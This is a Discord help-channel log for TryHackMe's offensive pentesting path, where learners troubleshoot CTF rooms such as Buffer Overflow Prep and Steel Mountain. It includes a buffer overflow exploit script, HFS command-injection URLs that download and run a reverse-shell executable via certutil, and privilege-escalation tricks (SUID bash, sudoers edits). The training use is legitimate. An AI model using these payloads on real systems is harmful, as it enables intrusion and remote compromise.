#offensive-pentesting-path

I just downloaded parrot os last night, I like it so far

Parrot is great OS with Huge tools but i don't think secure

Hello Guys. Here a rookie question for you. I´m conducting some pentest as trainee security consultant. I have network visibility to a Windows Active Directory Server. However, I don´t have a domain user account for authentication and my computer isn´t on the domain. I know the name of domain (something.local). Is there any way to find another useful information about the domain in terms of AD recon?. I know some tools like Powerview or BloodHound but both requires at least a regular user auth for the domain. Thanks in advance.

First and foremost, this seems like a really good question for whoever is supposed to be training you.

But in general, if you're not on a domain-joined machine, you will need to find a way to pivot to a machine that is.

You can enumerate basic information about the domain externally. You could check out a lab like Attacktive Directory to see some basic ways to do that.

impacket is fun after you have the enum

but @rancid vine is more qualified and attactive is amazing

And again, this seems more like something you want to ask your trainer.

If the trainer doesn't know, sign him up for TryHackMe.

thank you guys!

Kerbrute do the job very well. I will me enrolling on Attacktive Directory later 🙂

Hi, can somebody suggest me a wordlist for enumerate users of AD with kerbrute

?

Seclists has some great lists

The user list in the Attacktive Directory room is pretty good honestly.

Ok thank you
Of course that one in attacktive directory, I mean I have already try that one, but I just started with AD, and i'm looking for another wordlist, someone just told me that kaonashi is a good option, but I don't know, guess i gonna take a look at it

Honestly your best bet in a real engagement is to try to develop a custom name list once you’ve figured out the client’s user naming conventions.

Scraping LinkedIn and websites for that info is usually a good start.

That really make sense, thank you so much I really appreciate your answer

You’re welcome. 🙂

I was doing the bof-prep room, and from someone's advice other day in the server...I downloaded the vuln files and put them in a windows running in my VM! When I am using the provided fuzzing script, I'm able to crash the program, and get the number of bytes that crash the program! But when I'm trying to get the offset, it doesn't crash the program! Bascially exploit.py isn't working for me! FYI: I tried to send the exploit payload via netcat directly, it does crash the program and I'm using python3. Below is the script I'm using with py3.

#!/usr/bin/env python3
import socket

ip = '192.168.149.129'
port = 1337

prefix = 'OVERFLOW1 '
offset = 1978
overflow = 'A' * offset
retn = ''
padding = ''
payload = ''
postfix = ''

buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.sendall((buffer+"\r\n").encode())
    print("Done!")
except:
    print("Could not connect.")

I even get the output as: ```Sending evil buffer...
Done!

Python3 is a little different with handling raw bytes

It's kind of a pain

Not working with python2 as well! I tried the same except the encode part

Finally figured out, we need to add s.recv(1024) in the script after we make the connection!

Hi there, could someone help me understand something regarding kerberoast attack on room corp ?

😦

Generally, it's best to directly ask

Just out of curiosity for anyone who has taken it, how close are the BOF rooms on THM to what I should expect on the eCPPT exam?

Gatekeeper is very, very similar.

Pretty much why I made the room.

Awesome, thanks. That's one of the main ones I've been practicing on, so my warm-fuzzy factor just went up.

Welcome.

Had issues with the Bof prep mahn all good now 🙂

I'm trying to list one specific single user in Powershell using "Get-NetUser", anybody knows how it's done?

You need Powerview imported as a module for that

I have that

What do you want to do with Get-NetUser?

I want to find if there is any property equals to something I want to find, then list everything of the user

for example, list the username(s) where user = admin2, or list the username(s) where cn = Administrator

Create a ps1 script then

my final goal is to actually find who my admins are

https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview ctrl +f get-netuser

lawl I was on this page

Skidy, ashu, dark

my final goal is to actually find who my admins are

wut? 😀

THM admins

Does any1 knows to create undetectable backdoor for windows

Doesn't sound ethical.

^

can you hack somebody without giving them link?

No one is going to answer that as that sounds sketchy

wut?

You’re asking if you can hack someone without a link that kinda gives me a feeling you’re trying to do something unethical

Hello, I've heard I can get my discord hacked by joining malicious servers, is that real ?

and everything hacked (that's why I unlinked everything i've had in my discord)

@tall ingot This is most likely not true

oh okay thank you, you're making my security feeling back lol

Can any1 help

You should read the install instructions on github

and plz take a screenshot, not a photo on your phone

I follow all the ins

But I'm getting this errir

I install the individual pydispatch but still showin error

can any1 help

Is it running with py 2.7 or 3

Py2. 7

You're likely using the old Empire.

You need to look for the bcsecurity empire version and use it.

@rancid vine thnx bro so much i was crackin my head for 2 days for this.

Question for people who’ve taken the Offsec learning path. Does the offsec path help learners prepare well for the OSCP?

It does a pretty good job of it. When I helped to redo it a month or two ago we added in more content that was relevant, like the Windows section.

@rancid vine 👍

Hey can someone help me the 'Internal' box?

What bit you stuck on?

i got into the phpmyadmin

You have to modify the template and create a reverse shell

phpmyadmin is running as a different user? or he is still www-data?

www-data IIRC

but i already have a reverse shell with www-data

Oh right ok

You have to look for file

with creds

when i try to look on a column it says there is a lot of error then i click ignore and the file is empty

Have you read the writeups?

No i wanna do this on my own before reading another technique off beating the map 😅

box*

Ah ok, have you tried looking in other directories?

on phpmyadmin?

Can you show a screenshot of where you are?

I'm a bit lost

here lol

Yea that isn't part of the room I never did anything like that

lol XD

mm okay

You have to create a shell with wp

yes

i found a file in there the cred of the phpmyadmin

dm me the creds

phpmyadmin isn't what you want.

Hi, I was doing the oscpoverflow1 bof when I noticed something weird on using python3. I had to use python2 just to eliminate the badchars and compare it on mona.

Yep, python3 handles the bytes differently

@keen iris so the only difference i did, is I need to encode the payload when using python3 since on the documentation it needed bytes as parameter

It's all kinds of weird

and i got different results when finding the bad char.. very weird.

here's the one on python3

To cut the story short, i already solved it using python2..

its kinda weird..

anway thanks.. its just that im stucked for a couple of hours trying on python3. well obviously the script on the bufferoverflow tutorial is python2.

just want to share.. was able to solve it using latin encoding.. Maybe this will help others who want to use python3 rather than python2 since it is already deprecated..

https://realpython.com/python-encodings-guide/

since 128 - 1024 decimal range is mostly latinic characters.. i was able to get the same result whenever i am sending the badchars on python2.

Hi, I am working on the final task of steel mountain room, but no matter what I do I am not able to get the initial shell, i have nc listener running, i have the http server running, i updated the exploit with the local ip and port, I double checked everything thousand times but after running the exploit multiple times the handler is not receiving anything, and I am not getting the shell, I deleted everything and started from zero, terminated the machine and worked on a new one but no initial shell, the metasploit task was a piece of cake and worked fine but not this one, any Ideas what could be wrong ?

@mortal lotus do you have a server running as well as a listener listening when you run it?

@mortal lotus do you have a server running as well as a listener listening when you run it?
@dense root Yes I do, and I can see the requests response "200 ok" when I run the exploit for the first time, but nothing on the second time and nothing on the listener, even if i kept running the exploits for 10 times.

What’s the ip you changed it to in the exploit

tun0 ip

Reset the target machine and try it again

Sometimes it doesn’t work

https://realpython.com/python-encodings-guide/
@fleet wedge Did you try UTF-8 encoding as well?

@stable geode yep. its not working. but what i used is latin-1 encoding. it stated in there as well that from 128-1024 are mostly latinic characters.

Was able to get the same results from the strings of python2 from the hexdump.

I get the point of using latin1, but UTF-8 should've worked because for most exploits for linux binaries when payload is encoded with UTF-8 it works well.

Python2 > Python3

When it comes to exploit development

Reset the target machine and try it again
@dense root I have been resetting it for the last 3 days , but thanks anyway 🙂 .

Then show a screenshot of what you edited in the exploit

yeah.. @stable geode thats why its weird. i used utf-8 at first, but the characters are different, and the badchars keeps on going and going after it reaches 128bytes.

And which netcat executable are you hosting?

yeah.. @stable geode thats why its weird. i used utf-8 at first, but the characters are different, and the badchars keeps on going and going after it reaches 128bytes.
@fleet wedge Make sense, never really did any windows pwn but will try soon enough.

@stable geode Thanks anyway. I've got an hour full of headache yesterday trying to convert the exploit from py2 to py3. I read an article stating that the encoding windows is using is CP-1252, maybe that is the reason why.

Could be the very reason.

Then show a screenshot of what you edited in the exploit
@dense root

@dense root

No need to blank out you vpn IP address.

And which netcat executable are you hosting?
@dense root I downloaded the one which url was there in the task.

Doing so makes it harder for us to troubleshoot.

No need to blank out you vpn IP address.
@rancid vine sure, here it is without blanking:

I'm going to start up Kali quick and try this against your target machine if that is ok with you.

I'm going to start up Kali quick and try this against your target machine if that is ok with you.
@rancid vine OK, no problem.

What IP do you have for it currently?

What IP do you have for it currently?
@rancid vine 10.10.144.100

So I just confirmed it works on a machine I booted up. So let's figure out why it isn't working for you.

Are you trying to run the exploit more than once?

yes

I'm going to have you try something else. It's going to take a couple of steps, so be patient.

Can you open the HFS webserver? The page on 8080 please.

Ok, Done

Ok. Close down your current python3 web server. Copy and paste this into that command line and hit enter.

After that, restart your python3 webserver. Let me know when you've done that please.

Change the LHOST to your IP address.

Sorry about that.

I don't have a lot of time. Are you finished with that part?

done

Ok. With your python3 webserver running, copy and paste this into the address bar of the browser. Make sure to replace the first IP with your target IP, and the second IP with your tun0 address.

http://10.10.48.142:8080/?search=%00{.exec|certutil.exe -urlcache -f http://10.6.2.56/pwn.exe C:\Users\Public\pwn.exe.}

It's all one line.

Just copy it all and paste it. Once you've made the changes, press enter. You should see the file grabbed in your python3 server.

Yes, the file was grabbed successfully.

Ok great. Last step. Make sure you have a netcat listener on your LPORT set in the payload. If you left it as is, it should be port 25. If you changed it, then set it to what you changed.

ok

Type this into the address bar, and change the IP address to the target IP. Press enter.http://10.10.48.142:8080/?search=%00{.exec|C:\Users\Public\pwn.exe.}

You should get a shell from it.

I do have a shell now, Thank you.

Welcome.

All we did there was essentially take what the automated exploit does, and break it down manually through the browser instead. The %00 is where the exploitable parameter is, allowing us to hijack the command execution to the host machine and inject our own commands.

@rancid vine That's great, thank you so much for your time and patience, really appreciate it.

You're welcome. Happy to help. Enjoy.

Can someone help me out with my openVPN troubleshooting?

#site-support would be best

this is so broken https://tryhackme.com/room/windows10privesc

Try RDP

As Spooks can testify, Windows is weird with stored creds+SSH

Is that Tib's course?

dude screw credential manager and ssh I hate it

I really like how the Buffer Overflow Prep is set up. 10 sequential tasks, basically all the same exact thing... really helps "drill things into your head".... i wish more rooms were set up like that... especially for learning paths

I have no problem with bof. But i want to practice some machine that has rabbit holes, a bit harder to get user shell, more rabbit hole in escalation.

I think there are many machine like oscp but not listed in the learning path

Gatekeeper

Outside of the path there isn't much on the platform that would mimic OSCP-like buffer overflows.

I will be exploring other paths after the oscp... in general i just like having multiple instances of the same challenge in the same room...instead of just 1 room, do this/that and its over. Can still learn a lot that way, but i like the reptitive nature of this buffer overflow prep room. Would like to see more like that across the board. Think it would help beginners a lot more. Still having a blast learning everything tho

@tawdry vessel can always mention in #room-ideas

I don't quite understand the session part

[*] Exploit completed, but no session was created.

That means your settings are most likely incorrect

You didn't successfully get a shell

Or that it's not vulnerable to that exploit

is everyone basically safe from remote attacks if they have a router? or is there a way to bypass the router? I am not talking about connections initiated by the victims.

NAT is not security.

how do u communicate with a certain device then? there are multiple devices under the router

You don't

But NAT is not security.

isnt that in itself a security feature?

No

https://blog.ipspace.net/2011/12/is-nat-security-feature.html#:~:text=Longer answer%3A NAT has some,so many variants of NAT.

https://www.f5.com/services/resources/white-papers/the-myth-of-network-address-translation-as-security

https://weberblog.net/why-nat-has-nothing-to-do-with-security/

yeah thanks i wanted to read more on this subject

but then again NAT makes remote exploitation almost impossible no?

No

Read the articles

how would you go around it and exploit the win7 machine then

sure

so maybe u can fake a "known" packet?

since unknown packets are dropped or something

No, you can still only communicate with things that are open

But NAT is NOT a security feature.

Remember that.

|| it's NAT a security feature ||

so to basically access anything on that network u need to somehow get root access on the router and use the router to scout the devices on that network

that is if you are doing this from outside the network completely

so to basically access anything on that network u need to somehow get root access on the router and use the router to scout the devices on that network
@gritty gulch Or literally any device on the network, that's pivoting

But it's still not a security feature.

Do not treat it like a security feature

Do not think of it as a security feature.

but any device there to connect to, needs to go through nat too. unless u just mean some device downloaded a malware that starts a reverse shell on it and u just get access to the network

okay, it's just a translation tool i got it

so my router seems to have an open telnet port which u can easily connect to by using default creds which i have changed, but everything seems extremely restricted and VERY limited in commands, u can have su and then shell but the shell (busybox) only has 2 scripts and u cant do much of anything. so if I wanna pentest this, where do i need to look first? is it possible that its fully secure?

That telnet port might only be exposed internally

You can upload programs

it's really restricted and i am just looking around rn to see if it's possible to get out of that restricted shell

and it's busybox (shell?) that might help in finding a way

Gnats are a security feature for fruit.

Guys i was doing Attacking Kerberos and task 8 is not working for me

What's wrong in here?

Do that command on the target, not kali

I'm doing steel mountain ctf, I have done every question exept one that asked powershell command to manually find the service name, can anyone help me with the powershell command, how to manually find windows services

Hello

I neet to know how to start learn to eJPT certificate ?

They changed PTS plan to yearly plan.

This is too expensive for me.

So, please tell to me how should start ?

Thank you

@strange estuary use sc

@strange estuary use sc
@keen iris Hi Thnks for the reply, can you clarify the answer

sc is a program

For interacting with services

On windows

It ships with windows

Read up on how to use it

sc is a program
@keen iris thanks

@final storm they are releasing a free pass that includes PTS. You'll need to buy the exam voucher for $200. Which makes it cheaper than the course was.

@rancid vine Hey, did you say that if you buy an exam ticket, you will have a PTS course? I do not understand very well, can you please explain? I found out that I had to buy it for $ 1999. If you know, give me a link or something. Thank you. I need your information.

They are releasing a free pass that includes PTS. You'll need to purchase the exam voucher separately for $200.

Really Thanks your information bro @rancid vine

hi

Hello - i was doing the Gatekeeper room as part of the OSCP path. I was stuck and looked at one of the write ups. The writeup used psexec.py and some other tool in the impacket set. I am not familiar with these at all..... does anyone know of more rooms (thm or others) that practice utilizing these tools so i can get more familiar?

attacktive directory

Impacket is a bit unstable I would just look up anything you need to do with the tool set

Gotcha... its just new, im sure theres.tons of other tools... i thought it was cool how they were used though.. like creating smbshare to mount to victim.computer.to easily transfer files..stuff ive.not done before.

Impacket has been out for a while

Oh wait you’re talking about geez luiz

Hello, am doing BufferOverflowPrep. When i run the xfreerdp command with the right tags. This pops up. Any help would be appreciated.

Uhh try it with the port?

Shouldn’t matter at all but idk why that’s happening for you

This is the command i run : xfreerdp /u:admin /p:password /cert:ignore /v:10.10.193.210

I see

Uhh try it with the port?

i tried the port but still same output

Can you remove the cert ignore part

Yes, i removed it and its working now. Thanks @dense root

Can you remove the cert ignore part
@dense root

Yay

thanks x100

You’re welcome

Welcome x101

One last thing

My Logged in Windows 7, takes my whole screen, i cant switch to my kali to follow tasks

You can minimize it

Yeah. Thanks @dense root Ctrl+Alt+Enter does the job

🥳

hi, room Game Zone, Task 6. I found an exploit, but cannot get it to work. *] Exploiting target 0.0.0.1

[-] Exploit failed: An exploitation error occurred.
[] Exploiting target 127.0.0.1
[-] Exploit failed: An exploitation error occurred.
[] Exploit completed, but no session was created.

i have tried different payloads but nothing

@fleet wedge from my memory another user was having this same problem earlier this week and the only way they could get it to work was by finding the exploit script itself from google or exploit db and running it manually

Blob said that he got it to work but I manually performed the exploit too

thanks

👀

Got what to work

I am Blob

I keep trying to hack into 127.0.0.1 but it seems to be impossible.

This is GameZone specifically

~~Oh I thought he was trolling ~~

tem br aqui ?

n né

fuii

Can you repeat the in English if you are looking for help 😄 ?

can any one help me in steel mountain machine ?
am not getting shell while doing without metasploit

@near ginkgo check pm

can someone please help me

i just joined the 1st buffer overflow room in the offensive path

and its intro said that this isn't teaching it from scratch

Can someone link me with resources to help understand futher

There in another Buffer Overflow room, that's a little more basic

Then there is https://www.youtube.com/watch?v=1S0aBV-Waeo which you can use to understand a bit more about what BOF's are

https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/ from TCM is a really nice intro too

Room: Active Directory Basics
I deployed the machine and ssh'd in... None of the "Get" commands work though.
PS C:\Users\Administrator\Downloads> Get-NetComputer -fulldata | select operatingsystem
Get-NetComputer : The term 'Get-NetComputer' is not recognized as the name of a cmdlet, function, script file, or
operable program.
Any ideas?

did you load powerview?

I imported according to the setup process with the command:
.\PowerView.ps1

thats not the command it says

. .\PowerView.ps1

youre missing a .

i just noticed im missing a . lol

🙂

thats funny.. man i've been googling for the past 15 minutes too lmao

it happens

Hi there !
Regarding assembly; I have trouble understanding what happen when I have the code RET into the stack, could someone give me some help ?

No, BOF1 is not in the offensive path, I will ask for help in another room

hey

Can someone please help me understand what I'm doing wrong? Working on the Buffer Overflow Prep series. I reverted the box and tried to setup OVERFLOW2 with nc (like in the tutorial), but when I jump into oscp.exe, it has the same offset, etc.

What am I doing wrong here?

Tried OVERFLOW3 too just in case and crashing at the same point with the same offset

Hi there, could I have some help understand the first BOF preparation room ? I sucess to do the exploit but there is one thing I do not understand :

buffer = overflow + retn + padding + payload

overflow does overflow untill the RSP adress which is the adress that RET will pick to exit the function.
retn the adress where we want to JMP when reaching RET at the end of the function
padding from there we are in the stack of the caller, we are writting some \x90 to make a slide into the shellcode
payload this is our shellcode

However, since we are jumping into a random function (at least that what i did) with the retn value, how does this sucess to execute the shellcode ?

Cyber mentor has videos for buffer overflow

if u do Tib's OSCP prep box and TCM's bof videos u probably don't need anything if u are going for OffSec OSCP.

Looking for someone who is good in website penetrations or web cracking expert for a paid gig, DM me to get more details of the job!

Jobs should be channeled through a moderator, and posted in #jobs-board @wet cosmos

I'm not able to post there!

Jobs should be channeled through a moderator, and posted in #jobs-board @wet cosmos
@ashen hornet Will keep in mind!

They are banned.

Friendly reminder: Do not engage with people doing stuff like that. Illegal stuff is illegal.

if u do Tib's OSCP prep box and TCM's bof videos u probably don't need anything if u are going for OffSec OSCP.
@silver fox Tibs prep box? Buffer Overflow prep box? Do you have a link for that? I've purchased his priv esc udemy classes in the past and liked them, I also like autorecon

@cybiz#9182 Are you asking something illegal?

They're banned

It's good if you want an automated tool rather than granular control of your scans. No doubt it's helped a lot of people who like that auto route.

Just make sure whatever you do in preparation, you practice it well before the big day.

Make sure you tinker with it some prior to. You'll likely have to do considerable research on the exam to learn how to exploit what you've found. Don't need to learn how to use a tool while you're at it. 😉

Best of luck on your test.

I've got a stupid question. Once I've completed a 'room' is there any reason not to exit it?

When you don't exit them, you can compare the number of rooms completed versus the number of rooms you're in, and the difference being the ones you haven't completed.

ah okay.

Makes sense.

Either way, it's up to you though. No harm in leaving completed rooms.

Hi there, to load the kiwi module into meterpreter, is it mandatory to have an uuid as administrator ?

Hello, Kindly need some help with this error. Am having a problem using psexec. Box is gateKeeper. Thank you.

@near ginkgo personally i copied the files to my local and worked on it from there, the connection was way too slow to do it over rdp

@opal dagger you need to install the cryptodome python module sudo pip install pycryptodome

@opal dagger you need to install the cryptodome python module sudo pip install pycryptodome
@modern sail Thanks man. Working now!!!!!!!!!!!!!!

I have a proxmox Virtual environment setup on an old computer

you can use virtualbox though

i think i have a windows vm with immunity setup on it if you want it

yeah i have a noisy old server in the garage, running proxmox

it goes ok

I got stuck in relevant machine...Any hints?

Don;t wanna check writeup

I found the creds though

@novel jackal check if you can write to that share and try to find your file somewhere else

@simple loom Yep I can write, working on that. Thanks!

Don't get bogged down on the easiest thing you find. 🙂

This channel is generally for the Offensive Pentesting path on the platform. Typically questions like these should be asked in #infosec-general

ok i will move it there

👀

I just started my path

hi, are the average times on a room correct? i took way longer then the time they expected

They’re just an estimate

Take your time, however much you need to learn it best 🙂

ok thanks blob:)

@near ginkgo grind is real

Good job on persevering with it @icy fractal (:

Same. It seems that the offset value is 2000 just like the OVERFLOW1. 😦 I think something is wrong in our setup.

Found that you need to update the fuzzer.py. You have to change "OVERFLOW1" to "OVERFLOW2". Same goes for 3rd exercise onwards.

@devout aurora @umbral crescent just stuck this in #resources as well, but I put this together for taking some of my uni group through that room. Might come in handy:
https://github.com/MuirlandOracle/stack-bof-fuzzer

I want to shoot for my OSWP later this year, any tips?

I had some trouble in the steel mountain

I dont know how to restart a service so i used a walkthrough in that he said that run a multi handler as a bg job and then restart the service but it didn't worked so i used a netcat listener to listen and got the root

Is there any other method to listen inside the metasploit or meterpreter as a back ground session????

Not sure what you mean here, what are you trying to do? if you already have a meterpreter session you don't need to listen, you're already connected

I'm having some issues with Relevant. I was just able to get user and I am working on root now. I am having some issues with abusing a privilege. Don't want to reveal too much here but can I bounce some questions off someone?

The exe just hangs when I execute in the n******v directory

What executable are you trying?

And how are you trying to execute it?

I mean that is there any another way to upgrade a netcat listener to a meterpreter session

@rancid vine, I'm having issues executing the PrintSpoofer.exe

Just doubling back to that machine now to double check my steps up to that point

If you grab it from here it for sure works. https://github.com/dievus/printspoofer

I host it there.

Thanks 🙂

Hey, anyone there who had done ECCPTv2 ?

it's better just to ask your question @oak iris, if someone is around who knows the answer and has time then they'll respond

Well there are 2 things i'd like to ask - is there any bruteforcing involved in the exam (or just plain enumeration?) and since it seems that you don't need to "root" everything, is it possible to get to DMZ with skipping something in the middle ?

ahh sorry, your question didn't really click with me at first, this channel is for thm room help specifically, can you take your last and post it in #infosec-general, you're likely to get better help there

If you grab it from here it for sure works. https://github.com/dievus/printspoofer
@rancid vine, thanks for this. I'll check this out soon

@rancid vine, the git repo you sent me worked a charm. I was using a fork from a different git; that must have been the issue. Thank you for the assist, great machine to work on!

Glad you figured it out and enjoyed it. 🙂

Hey guys how can i find out what port is the web server on?

nmap scan

Yeah i did. I scanned port 80.

and all ports

on what room @dense spindle?

and perhaps show a screenshot

Good day. I'm currently in the BufferOverflowPrep room, and in the third task (OVERFLOW3) I'm having an issue: After getting badchars, I cannot create any payload nor find any jmp address. Am I doing something wrong?

Thanks in advance

This is what it happens

I've thought trying quitting some of the badchars (i.e. \xef) because in the explanation says something like "sometimes appears also as badchar the next one of a real badchar", but I'm not sure

Ahh okay, I can auto answer me. As I said above, the badchars are not all of these, they are only:\x00\x11\x40\x5F\xb8\xee

Thanks anyway @near ginkgo and sorry by my clumsy question

Hahahah, don't worry. Thank you so much. Now I've finished that room and I'm going to start another initiate BOF room. I'm liking this 🙂

Does anyone know how to scan for what port is the web server running on?

I an stuck on this for the past two weeks.

I am*

scan all the ports on the box

check which one comes back as a web server

So with the -p- command correct ?

@dense root

try it and see if it works 🙂

Ah okay thanks brother.

Happy Holidays Everyone.

Hello guys. I would want someone to explain me john the ripper.

did you google it @rough hound? what's confusing you?

I googled it and also watch some of the tutorials but i still dont understand it

ok, what don't you understand? what it is, how it works, when to use it? all of the above, something else?

I mean i understand in which situations its good to use but i think you can do the same job with other tool

yes, you can

for example hashcat can do most if not all (or more) of what jtr can do

haven't compared every feature between them but indeed, you can use hashcat, or other tools in many cases, instead of john

one area that is useful is that hashcat takes advantage of your GPU (although it can use CPU too with some tweaking) while john is fine on a CPU out of the box

that means that in a VM you're often better off with john

if you run on your host where you probably have a GPU, then hashcat can fly

in infosec there is nearly always more than one way to do any task, you just pick the one that's best suited to the job at hand

Yea but most of the people i know was telling me you need to learn john its amazing tool and i mean i can do the same thing with easier tools and also i cant even write command in john that says decrypt this password

So i think its not tool for me

Too many complicated stuff

ahhhh, it's not that complicated is it? usually you have to give it like 2 things, your hash and a wordlist

you may have to run a helper beforehand to prep the hash but that's generally straightforward too, like ssh2john for an ssh key

yea but in most of the programs there is like -w or something here its --wordlist=

And its not the big problem but i cant remember these

you can use -w=<list> with john

if you feel john is too complex then i fear you won't enjoy hashcat either

and you do really need to be able to use at least one of those

it's worth making the effort to learn, once you get it you'll never forget it

Yea i have bad relationship with hashcat as well

Yea i guess

Need to just train more and try harder

sigh

Doc, I'm happy to help if you can be a bit more specific with what you're trying to do and having issues with. Maybe if you can share a couple of the john commands you couldn't get to work, we can start with troubleshooting your syntax.

Yea sure but will you be here tommorow? Cause its like 2 am in the morning in my state

That's fine.

Good.

To be honest i too don’t prefer using kali tools mainly because of the syntax .i usually use cyberchef or online tools

Im working with KeepNote

Hiii

I'm going to murder this BOF

1

Ok, so I made it to the end.. I have correct ip, port, prefix, offset, overflow, retn="\xaf\x11\x50\x62" , padding= "\x90" * 16 , buf = (my payload, with correct bad chars) , payload = "buf" I restart the app, and can't get a shell

I double checked payload.... pulling hair now. which means something stupid is wrong. May reset the machine to a new one..

your payload is the string buf, not the variable buf

lol

thankl ytou

ding ding ding

shell received. Always the little things getting me... been like 6 months since I did a BOF (twice) so need back in the game before OSCP test. I'm like, I'm not that much of an idiot.... where is my mistake... (Staring right at me). Thx mate

😄

@cyan charm we all know that feeling.

@grim pendant

I'm looking for material to read before starting the buffer overflow section, because I am LOST!
please pleading_face

https://www.youtube.com/watch?v=1S0aBV-Waeo (Computerphile bof theory)

https://www.youtube.com/watch?v=oS2O75H57qU (LiveOverflow writing a simple Bof)

https://www.youtube.com/watch?v=qSnPayW6F7U&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G this is meant to be good too (TCM Buffer Overflows Made Easy)

IDK if you get on with youtube

I'd also recommend reading http://phrack.org/issues/49/14.html

(Smashing the stack for fun and profit)

Thanks! Let me go through the above material and I'll see if I will understand and then I'll come back

we can get the possible bad chars with mona command but the lab description saying that all might not be the bad chars, then how can i get the exact bad chars? i read it online and they saying you can get it by trial and error but i am confused, can someone guide me in the right direction?

Usually, when I got 2 badchars togethers (i.e, \x0a and \x0b), only take the first, and re-run. For me it works 🙂

i always get 6-8 bad chars and the lab expect an answer of 3 bad chars, so i should exculde one more bad char along with /x00 untill i get no bad chars left?

I agree, not sure why but I think it happens cause the first badchar affects the second one. 90% of the time, the second badchar isn't a badchar at all.

ahh its confusing but i hope it will make sense one day xD

a badchar is a badchar because it's making the execution flow change, i.e. it's being interpreted as a microinstruction. A microinstruction may then try to use the next values on the stack too, therefore those might get changed or marked as bad. The best way to identify badchars is to remove them one by one, rechecking after each time (with mona or similar) and adding when you find another

💯

What is the name of the role who's job is to identify attacks against an organisation?

for context its useful if you tell us room, task & question @fleet wedge

everybody's

CISO

That was a room help question, so please don't give direct answers @fleet wedge

Not sure if it's correct, but still

yes it is

@mighty dust please don't post answers to THM questions

Oh mb, I didn't realize that was a THM question.

l

Having an error with Gatekeeper. After transferring the exe, I get a VCRUNTIME140.dll is missing error. I updated the visual c++ redistributable in my windows test vm, but no go. :\ Anyone else get and solve this issue?

have you tried this fix? https://www.youtube.com/watch?v=m5pjAWai384

4am here.... I will bookmark for tm! lol

Thanks mate

In case you require further help, please ask in #room-help 🎄

Thanks Tim!

Ok, more muder is gonna happen

aaaaaand, got it

hey guys, I am planning to take this pathway. If I finish this pathway how close will I be in achieving the OSCP certificate. Will I also need to put some quality time into hackthebox.

it's hard to say as it depends on how much you absorb of the pathway lessons. I would guess that after doing the pathway you'll have been introduced to most of the needed topics, but in every topic there are lots of variations and different aspects that only practice practice practice will make you familiar with

It'll help, but it isn't not an all-inclusive prep for OSCP.

You really need to immerse yourself in as many labs environments as you can.

thanks for the info

I was looking at HTB labs, time is a relative factor in my lifestyle. I need to get is ASAP venturing into cyber

Also Tib's privesc

Tib's privesc courses are awesome

Offensive pathway focuses on the use of sqlmap for SQLi which if funny cause sqlmap is not allowed at OSCP exam. Probably biggest fail in path. Also it makes sense to add tibs privesc rooms and a couple of AD rooms. Furthermore saying it is a 48 hrs path is COMPLETELY off in my opinion. It more like 120 hrs and even more for complete newbies.

@sudden meteor It's not an OSCP path

Even if it was, the exam does NOT cover AD. Only PWK covers AD.

Wheres the best place to learn buffer overflow? I cant get the offensive pathway ones working

Virtual Hacking Labs I heard is a good resource to use too. If you have the extra income/time/etc, before oscp.

well here we go, starting my journey 🙂

https://tenor.com/view/same-nope-no-freshofftheboat-goodbye-gif-4030691

https://tryhackme.com/room/bufferoverflowprep is an amazing room.

What's the goal when doing that?

How would you test that though?

That would be illegal.

100%! After going through that room and the others on the THM path, I breezed through the BOF on eCPPT in about 30 minutes.

Hello everyone, working through Buff overflow prep room as we speak, managed to do the first room fairly smoothly, now I sorta got stuck on the second room, but managed to figure it out, for whoever is stuck on Task 3, if you're still getting Task 2 EIP offset you need to change OVERFLOW1 to 2 on both fuzzer.py and exploit.py scripts.

same will go for 3.4.5.6... tasks 😛 hopefully none of you had a brain fart like I did 😄

Hi, does someone know what has to be changed in pentestmonkey's php-reverse-shell in order to work on windows server?

Try reading through it to see if you can figure it out 🙂

so in vulnversity - i found the priv esc path....should i reuse the php rev shell or use a bash rev shell? I created a new service and started it but can't seem to catch a shell

I'd argue the best way is to add whomever to sudoers

Create a file in sudoers.d that adds your current user

I'd argue setting SUID on bash is better way

how do we feel about adding a new root user to /etc/passwd? that gets around any issue with 'real' uid vs euid

They're all valid ways

And you'll develop preferences

imo SUID is just easiest to do cuz its just chmod +s /bin/bash

and i go for easiest cuz these are CTFs and it doesnt matter how noisy you are

mistyped an ip in my bash rev shell

got it 🙂

filtering through the programs with SUID bits set - the answer to the room took systemctl so it kind of lead you down that path

There is a reason given for this -- what is it? how to solve this

this is in the nmap room guys

@terse herald please answer

Please done ping cmn for no reason

you will also generally get faster help from #room-help

you also need to give further context and information rather than just how to solve this

Did you read the hint?

yea but i couldn't understand

It says to use the -vv switch

i used that switch, it showed some out output but i can't guess the answer

The answer is in the output

Also please don't send unsolicited friend requests

ok sorry

you mean nmap -vv -Pn <address>

Yea

i tried it but...

Try without -Pn

its blocking my ping probes

screenshot

The answer is in front of you

in the second screen shot ?

heyy dude

cracked it

Should I buy the TCMs equivalent courses if have taken the Tib's privesc ones?

Ask in #infosec-general . 🙂

So I found a script on OSCP subreddit, specifically made to help out people with BoF, can I share the link to it? here a summary of it( I didn't create it)

This sounds like something that automates the whole process and that defeats the purpose of the oscp bof

the guy sent the question to offsec in regards to it and got thumbs up, you're still manually entering values though, its not fully automated

what's the name of the script?

Can I link stuff?

I guess you can link it but i wouldn't trust any automated exploitation scripts when it comes to oscp

https://github.com/the-c0d3r/buffer-overflow

ta, worth a look at if nothing else

Linux shell references (streams, bash), there is even written what will not work on windows in comment, but my .php is not "lets change it myself" level 😄

It doesn’t need to be

There are 2 lines that have comments that literally say “CHANGE THIS”

That’s all you need to change

If the box can run php then that’s all you need to change

If it can’t then a php script won’t work

well it does make a comment that something won't work on windows blob, tbf there might be a little more to it no?

Oh, if you say so. Tbh I’ve never used that script for my php reverse shells

So apologies if I’m wrong I just assumed it’s a one size fits all type dealio

Bad blob

nah, he says that "You’ll need to modify it before it will work on windows."

Well then I am incorrect

And shall now go under my blob rock

but you got me for few seconds, i thought i was blind so i run through code once again 🙂

Sorry about that 😅

You can find other php reverse shells online that work for windows you don’t have to use that one

i know, i was just curious because other one i found is basically compiled and .exe is used for reverse shell, this one would show how php/win cmd approach would be.

Gotcha. So idk for sure cuz I don’t use that reverse shell but I’m guessing you’d have to change wherever it’s using bash commands to use cmd commands instead

So that you could get command prompt

